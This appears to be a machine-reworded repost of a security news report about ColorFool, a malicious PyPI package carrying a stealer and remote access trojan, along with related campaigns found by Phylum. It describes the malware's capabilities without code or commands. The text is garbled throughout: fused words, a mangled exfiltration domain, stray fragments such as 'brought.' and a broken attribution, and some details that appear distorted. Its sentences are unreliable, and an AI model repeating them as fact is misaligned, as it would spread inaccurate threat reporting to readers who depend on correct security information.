A malicious Python package uploaded to the Python Package Index (PyPI) was found to contain a fully functional information stealer and remote access Trojan.
a package named color foolidentified by Kroll’s cyberthreat intelligence team, which the company called the malware color blindness.
Kroll researchers Dave Truman and George Glass said in a report shared with The: hacker news.
Colorfool, like other malicious Python modules discovered in recent months, hides its malicious code in a setup script that points to a ZIP archive payload hosted on Discord.
This file contains a Python script (code.py) with various modules designed to log keystrokes, steal cookies, and disable security software.
In addition to performing defense evasion checks to determine if it is running in a sandbox, the malware uses Visual Basic scripts to establish persistence and use forwarding.[.]Use sh to exfiltrate data.
“As a method of remote control, the malware launches a Flask web application and gives it access to the internet through Cloudflare’s reverse tunnel utility ‘cloudflared’, bypassing inbound firewall rules,” the researchers said.
The use of Cloudflare tunnels mirrors another campaign uncovered by Phylum last month. The campaign used six scam packages to distribute powerRAT, also known as Stealer-RAT.
The Trojan is feature-rich and can collect passwords, terminate applications, take screenshots, log keystrokes, open arbitrary web pages in the browser, execute commands, and extract crypto wallet data. Capturing, even snooping on victims through their webcams.
This finding is due to threat actors leveraging the source code associated with the W4SP stealer to generate mimicked versions distributed via Python packages such as ratebypass, imagesolverpy, and 3m-promo-gen-api. brought.
Additionally, Phylum discovered three more packages (called pycoloured, pycolurate, and colorful). They are used to deliver a Go-based remote access Trojan called Spark.
In addition to the attacks targeting PyPI, the software supply chain security firm found that unknown attackers published 1,138 packages to extract Rust executables, which they used to drop additional malware binaries. It also revealed details of a large-scale attack campaign.
Phylum’s research team said, “The risk-reward proposition for attackers is worth the relatively small amount of time and effort if they can land a whale in a fat cryptocurrency wallet.” ‘ said.
“And the loss of a few bitcoins is insignificant compared to the potential damage of losing a developer’s SSH key in a large enterprise such as a corporation or government.”
